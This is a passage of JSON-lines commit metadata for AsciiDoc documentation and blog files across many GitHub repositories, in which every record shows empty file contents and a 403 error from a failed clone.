ro\/hubpress.io,wushaobo\/wushaobo.github.io,haxiomic\/haxiomic.github.io,pokev25\/pokev25.github.io,thrasos\/thrasos.github.io,caseyy\/caseyy.github.io,topranks\/topranks.github.io,pointout\/pointout.github.io,debbiezhu\/debbiezhu.github.io,roamarox\/roamarox.github.io,live-smart\/live-smart.github.io,IdeaThoughtStream\/IdeaThoughtStream.github.io.old2,cmosetick\/hubpress.io,pysaumont\/pysaumont.github.io,RandomWebCrap\/randomwebcrap.github.io,ciptard\/ciptard.github.io,marioandres\/marioandres.github.io,sebasmonia\/sebasmonia.github.io,parkowski\/parkowski.github.io,randhson\/Blog,flug\/flug.github.io,tr00per\/tr00per.github.io,jgornati\/jgornati.github.io,angilent\/angilent.github.io,Akanoa\/akanoa.github.io,dbect\/dbect.github.io,ennerf\/ennerf.github.io,yaks-all-the-way-down\/yaks-all-the-way-down.github.io,Rackcore\/Rackcore.github.io,Kif11\/Kif11.github.io,mozillahonduras\/mozillahonduras.github.io","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bithunshal\/shalsblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"459dd80d374091166e0579975967cdebd59d700e","subject":"Update 2015-03-18-.adoc","message":"Update 2015-03-18-.adoc","repos":"hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress","old_file":"_posts\/2015-03-18-.adoc","new_file":"_posts\/2015-03-18-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hinaloe\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"295697a6d93d8909361ad1e0e4f9721de2bf5134","subject":"Update 2016-03-15-.adoc","message":"Update 2016-03-15-.adoc","repos":"s-f-ek971\/s-f-ek971.github.io,s-f-ek971\/s-f-ek971.github.io,s-f-ek971\/s-f-ek971.github.io,s-f-ek971\/s-f-ek971.github.io","old_file":"_posts\/2016-03-15-.adoc","new_file":"_posts\/2016-03-15-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/s-f-ek971\/s-f-ek971.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85f09615537bca031d2444b85d9ba25e9119dde1","subject":"Add scaling documentation","message":"Add scaling documentation\n","repos":"redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-openstack\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"76c3ebd3ceca5724acfa1b56378a8c4da9618c42","subject":"Create README.adoc","message":"Create README.adoc","repos":"robo-kids\/scratch-for-kids","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/robo-kids\/scratch-for-kids.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bff4d715c2d511c5b4b577df56ae9fe6c428247b","subject":"Released v0.2.0","message":"Released v0.2.0\n","repos":"resilience4j\/resilience4j,drmaas\/resilience4j,resilience4j\/resilience4j,goldobin\/resilience4j,mehtabsinghmann\/resilience4j,RobWin\/javaslang-circuitbreaker,javaslang\/javaslang-circuitbreaker,storozhukBM\/javaslang-circuitbreaker,drmaas\/resilience4j,RobWin\/circuitbreaker-java8","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e8fefd5e421dadc1e69a558ecd5c67d4296f82f8","subject":"[docs] Add docs on full data dirs","message":"[docs] Add docs on full data dirs\n\nChange-Id: If1081cab4c84789d29a0ccdccfd11c190b6164cf\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9967\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nTested-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\n","repos":"andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"948c7d7ddb909f4ffb959f25387f9ad83a6ee1cf","subject":"Update 2016-08-30-Hello.adoc","message":"Update 2016-08-30-Hello.adoc","repos":"RandomWebCrap\/randomwebcrap.github.io,RandomWebCrap\/randomwebcrap.github.io,RandomWebCrap\/randomwebcrap.github.io,RandomWebCrap\/randomwebcrap.github.io","old_file":"_posts\/2016-08-30-Hello.adoc","new_file":"_posts\/2016-08-30-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RandomWebCrap\/randomwebcrap.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"116bc9629be5e08acb9963f35a9b199a51235512","subject":"Update 2016-09-03-Title.adoc","message":"Update 2016-09-03-Title.adoc","repos":"bbsome\/bbsome.github.io,bbsome\/bbsome.github.io,bbsome\/bbsome.github.io,bbsome\/bbsome.github.io","old_file":"_posts\/2016-09-03-Title.adoc","new_file":"_posts\/2016-09-03-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bbsome\/bbsome.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5e9ad69f2f49328f085f957f013ff0a9f7fe9b0","subject":"Installing PIL in virtualenv","message":"Installing PIL in virtualenv\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"0b9c4ebbfe7c57a823fa0b42467d4bcea5fe733e","subject":"Updated documentation","message":"Updated documentation","repos":"RobWin\/javaslang-circuitbreaker,goldobin\/resilience4j,drmaas\/resilience4j,resilience4j\/resilience4j,mehtabsinghmann\/resilience4j,storozhukBM\/javaslang-circuitbreaker,drmaas\/resilience4j,resilience4j\/resilience4j,RobWin\/circuitbreaker-java8,javaslang\/javaslang-circuitbreaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"040ba4c8e98863ae51698013fc5ba21578d4cea3","subject":"add a README","message":"add a README\n","repos":"azuwis\/asciidoctor-fopdf,asciidoctor\/asciidoctor-fopub,getreu\/asciidoctor-fopub,azuwis\/asciidoctor-fopdf,asciidoctor\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub,getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/getreu\/asciidoctor-fopub.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95b84c3f4ae03b076d33bdab6f93446dfff3e747","subject":"doc update","message":"doc update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"35a23cff2baf27083ee4ac24f98861f25583437d","subject":"Added Http Session Handling docs","message":"Added Http Session Handling docs\n","repos":"apache\/camel,gnodet\/camel,davidkarlsen\/camel,cunningt\/camel,mcollovati\/camel,nicolaferraro\/camel,tdiesler\/camel,davidkarlsen\/camel,christophd\/camel,kevinearls\/camel,adessaigne\/camel,onders86\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,davidkarlsen\/camel,kevinearls\/camel,Fabryprog\/camel,punkhorn\/camel-upstream,apache\/camel,Fabryprog\/camel,objectiser\/camel,tadayosi\/camel,zregvart\/camel,tdiesler\/camel,christophd\/camel,ullgren\/camel,pmoerenhout\/camel,christophd\/camel,adessaigne\/camel,cunningt\/camel,tadayosi\/camel,gnodet\/camel,gnodet\/camel,tdiesler\/camel,mcollovati\/camel,apache\/camel,tdiesler\/camel,punkhorn\/camel-upstream,cunningt\/camel,kevinearls\/camel,tadayosi\/camel,gnodet\/camel,zregvart\/camel,tdiesler\/camel,nikhilvibhav\/camel,tadayosi\/camel,adessaigne\/camel,DariusX\/camel,pax95\/camel,punkhorn\/camel-upstream,pmoerenhout\/camel,pmoerenhout\/camel,Fabryprog\/camel,ullgren\/camel,onders86\/camel,pmoerenhout\/camel,onders86\/camel,tdiesler\/camel,pax95\/camel,alvinkwekel\/camel,pax95\/camel,objectiser\/camel,nicolaferraro\/camel,gnodet\/camel,onders86\/camel,adessaigne\/camel,alvinkwekel\/camel,CodeSmell\/camel,pax95\/camel,kevinearls\/camel,mcollovati\/camel,pax95\/camel,Fabryprog\/camel,pax95\/camel,apache\/camel,kevinearls\/camel,CodeSmell\/camel,onders86\/camel,alvinkwekel\/camel,zregvart\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,adessaigne\/camel,onders86\/camel,nikhilvibhav\/camel,tadayosi\/camel,DariusX\/camel,pmoerenhout\/camel,kevinearls\/camel,tadayosi\/camel,ullgren\/camel,DariusX\/camel,DariusX\/camel,apache\/camel,objectiser\/camel,cunningt\/camel,mcollovati\/camel,christophd\/camel,cunningt\/camel,christophd\/camel,alvinkwekel\/camel,ullgren\/camel,CodeSmell\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,apache\/camel,CodeSmell\/camel,cunningt\/camel,christophd\/camel,nicolaferraro\/camel,objectiser\/camel,adessaigne\/camel,zregvart\/camel","old_file":"docs\/user-manual\/en\/http-session-handling.adoc","new_file":"docs\/user-manual\/en\/http-session-handling.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"001e449be25bd2991f19f40bf9f7d275629fad4a","subject":"Update README.adoc","message":"Update README.adoc\n\nFixed links to follow the asciidoctor syntax, not MD.","repos":"mbenson\/spring-cloud-config,rajkumargithub\/spring-cloud-config,appleman\/spring-cloud-config,psbateman\/spring-cloud-config,thomasdarimont\/spring-cloud-config,spring-cloud\/spring-cloud-config,fangjing828\/spring-cloud-config,rajkumargithub\/spring-cloud-config,fangjing828\/spring-cloud-config,shakuzen\/spring-cloud-config,appleman\/spring-cloud-config,shakuzen\/spring-cloud-config,psbateman\/spring-cloud-config,marbon87\/spring-cloud-config,thomasdarimont\/spring-cloud-config,shakuzen\/spring-cloud-config,royclarkson\/spring-cloud-config,spring-cloud\/spring-cloud-config,psbateman\/spring-cloud-config,royclarkson\/spring-cloud-config,appleman\/spring-cloud-config,mstine\/spring-cloud-config,rajkumargithub\/spring-cloud-config,thomasdarimont\/spring-cloud-config,marbon87\/spring-cloud-config,mbenson\/spring-cloud-config,mstine\/spring-cloud-config,fkissel\/spring-cloud-config,fkissel\/spring-cloud-config,royclarkson\/spring-cloud-config,mstine\/spring-cloud-config,mbenson\/spring-cloud-config,marbon87\/spring-cloud-config,spring-cloud\/spring-cloud-config,fkissel\/spring-cloud-config,fangjing828\/spring-cloud-config","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomasdarimont\/spring-cloud-config.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"087f43ff9bffb2d2edfdcbfe3970382ebb9631bf","subject":"Add HTML version for Python","message":"Add HTML version for Python\n","repos":"cmpitg\/programming-language-notes","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"f3defa7f9f924fd79f66b283f168b5709cb71a4c","subject":"Create README.adoc","message":"Create README.adoc","repos":"cybercomsweden\/rest-doc,ivargrimstad\/rest-doc,peterivarsson\/rest-doc","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/peterivarsson\/rest-doc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b303f22dc4914dba83afa6d758cbfa27b44f783","subject":"README: rewrite\/revisement of many sections","message":"README: rewrite\/revisement of many sections\n\nThe introduction uses wording mostly copied from the web site to\nmaintain consistency within the project, and the usage of the term\n\"IWAD\" is greatly reduced. I still define it, but only so that\nsomeone might become familiar with the term when other people use it,\nrather than as a primary term. Like wise, \"port\" and \"source port\"\nare largely replaced with \"engine,\" but while defining the former so a\nnewbie can understand what community members are speaking of.\n\n\"How to play\" has some additional information about how to actually\nget an engine to play the game. It was previously lacking. Odamex is\nthe only port actually outright named as a recommendation, but I try\nto keep from sounding like it's the _only_ choice.\n\nThe \"general rules\" to follow has been reduced from four to three, the\nfirst one heavily rewriting so as to not imply that derived works are\ncompletely forbidden.\n\nThe \"Using Git\" section also had a major reworking. I don't really\nlike the section entirely myself. Either needs more revisement or\nejected entirely.\n\nQuite a few linguistic tweaks in all of the sections.\n\nGame names are more consistently italicized.\n","repos":"CWolfRU\/freedoom,CWolfRU\/freedoom","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CWolfRU\/freedoom.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"c93a3d0607c04dabb5166d683870931860b1eea0","subject":"Add archive text to README.adoc","message":"Add archive text to README.adoc\n","repos":"spring-projects\/spring-android,spring-projects\/spring-android","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-android.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7818a60469faf69ebe0b45d8062ae2dcedc30357","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d386ab2d6b60f88917b132ce7033642f213f983","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3207556f40114196fa40fb7b3d9c1746d6d0e59","subject":"Update 2017-10-27-.adoc","message":"Update 2017-10-27-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-27-.adoc","new_file":"_posts\/2017-10-27-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc97654536f316bd8ed12c055c2d135a19057b22","subject":"Update 2015-08-27-Railroads-Silicon-and-Tigers-My-Asian-American-Dream.adoc","message":"Update 2015-08-27-Railroads-Silicon-and-Tigers-My-Asian-American-Dream.adoc","repos":"extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io","old_file":"_posts\/2015-08-27-Railroads-Silicon-and-Tigers-My-Asian-American-Dream.adoc","new_file":"_posts\/2015-08-27-Railroads-Silicon-and-Tigers-My-Asian-American-Dream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/extrapolate\/extrapolate.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d27382f38544f8f6490111374a31b7e6488ea86","subject":"Delete the file at '_posts\/2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc'","message":"Delete the file at '_posts\/2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc'","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","new_file":"_posts\/2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7fc3c1430065294b4a99d1f46ec9f6e8d1030ac4","subject":"fixing a link","message":"fixing a link\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"183eda111e486ef6b28de78ef146376110d02478","subject":"lecture part 1 on chapter 09","message":"lecture part 1 on chapter 09\n","repos":"jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405","old_file":"lecture06_20170925.adoc","new_file":"lecture06_20170925.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/netwtcpip-cmp405.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9cfa68f06a15dcc99442d1ef05291744bf35e7d9","subject":"updated description of apoc user guide","message":"updated description of apoc user guide\n","repos":"inserpio\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/larusba\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d31e0fc429c0f7003255ee7ac404876294184d0b","subject":"Update 2015-05-03-Weihenstephan-mit-Wolken.adoc","message":"Update 2015-05-03-Weihenstephan-mit-Wolken.adoc","repos":"fundstuecke\/fundstuecke.github.io,fundstuecke\/fundstuecke.github.io,fundstuecke\/fundstuecke.github.io","old_file":"_posts\/2015-05-03-Weihenstephan-mit-Wolken.adoc","new_file":"_posts\/2015-05-03-Weihenstephan-mit-Wolken.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fundstuecke\/fundstuecke.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2351ec3e4e475cddc8eaf36478469c4de469c105","subject":"Update 2015-06-09-JS-ES6-language-features.adoc","message":"Update 2015-06-09-JS-ES6-language-features.adoc","repos":"ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io","old_file":"_posts\/2015-06-09-JS-ES6-language-features.adoc","new_file":"_posts\/2015-06-09-JS-ES6-language-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ragingsmurf\/ragingsmurf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36c0fb069c0091a6fd1c99194c4cbf0b2a8b0db9","subject":"Update 2018-01-29-Whats-up-Flutter-February-2018.adoc","message":"Update 2018-01-29-Whats-up-Flutter-February-2018.adoc","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2018-01-29-Whats-up-Flutter-February-2018.adoc","new_file":"_posts\/2018-01-29-Whats-up-Flutter-February-2018.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ec1ee39b4aa7b30783f26bb70500441ec9a5e05","subject":"Import release notes for Groovy 1.7","message":"Import release notes for Groovy 1.7\n","repos":"PascalSchumacher\/groovy-website,webkaz\/groovy-website,benignbala\/groovy-website,groovy\/groovy-website,sdkman\/sdkman-website,kevintanhongann\/groovy-website,rahulsom\/sdkman-website,m-ullrich\/groovy-website,marc0der\/groovy-website,sdkman\/sdkman-website,kevintanhongann\/groovy-website,benignbala\/groovy-website,dmesu\/sdkman-website,groovy\/groovy-website,marcoVermeulen\/groovy-website,dmesu\/sdkman-website,marc0der\/groovy-website,marcoVermeulen\/groovy-website,rahulsom\/sdkman-website,webkaz\/groovy-website","old_file":"site\/src\/site\/releasenotes\/groovy-1.7.adoc","new_file":"site\/src\/site\/releasenotes\/groovy-1.7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rahulsom\/sdkman-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0c2850650fcdf6f38a4880425ff479400efaed9a","subject":"Import release notes for Groovy 2.4","message":"Import release notes for Groovy 2.4\n","repos":"m-ullrich\/groovy-website,benignbala\/groovy-website,rahulsom\/sdkman-website,webkaz\/groovy-website,groovy\/groovy-website,marc0der\/groovy-website,kevintanhongann\/groovy-website,benignbala\/groovy-website,webkaz\/groovy-website,marcoVermeulen\/groovy-website,kevintanhongann\/groovy-website,sdkman\/sdkman-website,marc0der\/groovy-website,sdkman\/sdkman-website,groovy\/groovy-website,dmesu\/sdkman-website,rahulsom\/sdkman-website,marcoVermeulen\/groovy-website,dmesu\/sdkman-website","old_file":"site\/src\/site\/releasenotes\/groovy-2.4.adoc","new_file":"site\/src\/site\/releasenotes\/groovy-2.4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rahulsom\/sdkman-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"98a693c89df0c8cd3c08c228159b650efb70afc5","subject":"Update 2015-04-15-Mon-Blog.adoc","message":"Update 2015-04-15-Mon-Blog.adoc","repos":"yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io","old_file":"_posts\/2015-04-15-Mon-Blog.adoc","new_file":"_posts\/2015-04-15-Mon-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yoanndupuy\/yoanndupuy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdba7c1b119ac56beac3057874274ca2be46985f","subject":"Update 2015-04-15-Mon-Blog.adoc","message":"Update 2015-04-15-Mon-Blog.adoc","repos":"yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io","old_file":"_posts\/2015-04-15-Mon-Blog.adoc","new_file":"_posts\/2015-04-15-Mon-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yoanndupuy\/yoanndupuy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a7dece734518eff0491bdfb4f721a16e02e540b","subject":"Update 2015-09-06-Second-Post.adoc","message":"Update 2015-09-06-Second-Post.adoc","repos":"glitched01\/glitched01.github.io,glitched01\/glitched01.github.io,glitched01\/glitched01.github.io","old_file":"_posts\/2015-09-06-Second-Post.adoc","new_file":"_posts\/2015-09-06-Second-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/glitched01\/glitched01.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"751a8e5dadcf420a46f9d99f36be249e5d1490d2","subject":"Update 2015-11-25-My-title.adoc","message":"Update 2015-11-25-My-title.adoc","repos":"jakkypan\/jakkypan.github.io,jakkypan\/jakkypan.github.io,jakkypan\/jakkypan.github.io","old_file":"_posts\/2015-11-25-My-title.adoc","new_file":"_posts\/2015-11-25-My-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jakkypan\/jakkypan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"766a0ac4188f2b357e8ce98ec3913ed25ef5addb","subject":"Update 2016-11-19-Ankurs-blog.adoc","message":"Update 2016-11-19-Ankurs-blog.adoc","repos":"yuyudhan\/yuyudhan.github.io,yuyudhan\/yuyudhan.github.io,yuyudhan\/yuyudhan.github.io,yuyudhan\/yuyudhan.github.io","old_file":"_posts\/2016-11-19-Ankurs-blog.adoc","new_file":"_posts\/2016-11-19-Ankurs-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yuyudhan\/yuyudhan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f472ffc7c0a6245171ab30456d1691bf527f8786","subject":"Update 2017-02-17-jquery-xxxx.adoc","message":"Update 2017-02-17-jquery-xxxx.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-17-jquery-xxxx.adoc","new_file":"_posts\/2017-02-17-jquery-xxxx.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e81ce1ff7ff969d2f244d71fe9f3b8591e31c80","subject":"Update 2018-02-06-Concurrency.adoc","message":"Update 2018-02-06-Concurrency.adoc","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2018-02-06-Concurrency.adoc","new_file":"_posts\/2018-02-06-Concurrency.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 